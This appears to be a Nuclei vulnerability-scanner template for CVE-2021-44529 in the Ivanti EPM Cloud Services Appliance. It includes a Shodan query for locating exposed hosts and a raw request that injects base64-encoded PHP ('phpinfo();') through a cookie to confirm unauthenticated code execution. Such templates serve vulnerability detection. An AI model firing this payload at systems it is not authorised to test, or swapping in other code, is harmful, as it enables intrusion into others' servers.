id: CVE-2021-44529 info: name: Ivanti EPM Cloud Services Appliance code injection author: duty_1g,phyr3wall,Tirtha severity: critical description: | A code injection vulnerability in the Ivanti EPM Cloud Services Appliance (CSA) allows an unauthenticated user to execute arbitrary code with limited permissions (nobody). reference: - https://twitter.com/Dinosn/status/1505273954478530569 - https://nvd.nist.gov/vuln/detail/CVE-2021-44529 - https://forums.ivanti.com/s/article/SA-2021-12-02 metadata: shodan-query: title:"LANDesk(R) Cloud Services Appliance" tags: cve,cve2021,ivanti,epm,csa requests: - raw: - | GET /client/index.php HTTP/1.1 Host: {{Hostname}} Cookie: ab=ab; c=cGhwaW5mbygpOw==; d=; e=; matchers-condition: and matchers: - type: word part: body words: - "phpinfo()" - "Cloud Services Appliance" condition: and - type: status status: - 200